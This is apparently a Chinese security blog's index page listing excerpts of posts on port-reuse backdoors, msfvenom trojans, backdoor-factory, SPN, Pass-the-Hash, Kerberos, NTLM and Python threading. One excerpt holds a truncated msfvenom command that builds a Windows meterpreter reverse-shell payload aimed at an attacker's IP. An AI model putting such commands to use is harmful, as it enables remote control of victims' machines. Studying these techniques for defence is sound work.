摘要:
补充一下端口复用的知识 0x01 关于端口复用 端口复用也是很老的后门技术,主要是劫持web服务器相关进程/服务的内存空间、系统API甚至劫持网络驱动去达到目的, 在winsocket的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁, 阅读全文
该文被密码保护。 阅读全文
摘要:
贴上使用笔记 不多介绍了 很简单的东西 msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/sh 阅读全文
摘要:
水一水最近玩的工具 弄dll注入的时候用到的 介绍这款老工具 免杀效果一般。。但是简单实用 目录: 0x01 backdoor-factory简介 0x02 特点功能 0x03 具体参数使用 PS:后门添加私钥证书 https://tools.kali.org/exploitation-tools/ 阅读全文
摘要:
0x01 关于SPN 服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。 服务主体名称是服务实例(可以理解为一个服务,比如 HTTP、MSSQL)的唯一标识符。Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。 在内部网络 阅读全文
摘要:
总结下PtH具体形式(wmicexec、powershell、msf等) 0x01 PtH攻击原理 && 黄金白银票据 PtH攻击原理 wiki https://en.wikipedia.org/wiki/Pass_the_hash 写的也很清楚 其中重要的是windows使用系统API(LsaLo 阅读全文
摘要:
本来昨晚就该总结整理,又拖到今天早上。。6点起来赶可还行 0x01 Kerberos前言 Kerberos 是一种由 MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 Kerberos 主要是用在域环境下的身份认证协议。 Activ 阅读全文
摘要:
域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows 2000 Server(or later)工作组环境中(Kerberos用在域模式下)。在AD域环境 阅读全文
摘要:
自己以前也写过多线程,发现都是零零碎碎,这篇写写详细点,填一下GIL和Python多线程多进程的坑~ 总结下GIL的坑和python多线程多进程分别应用场景(IO密集、计算密集)以及具体实现的代码模块。 目录 0x01 进程 and 线程 and “GIL” 0x02 python多线程&&线程锁& 阅读全文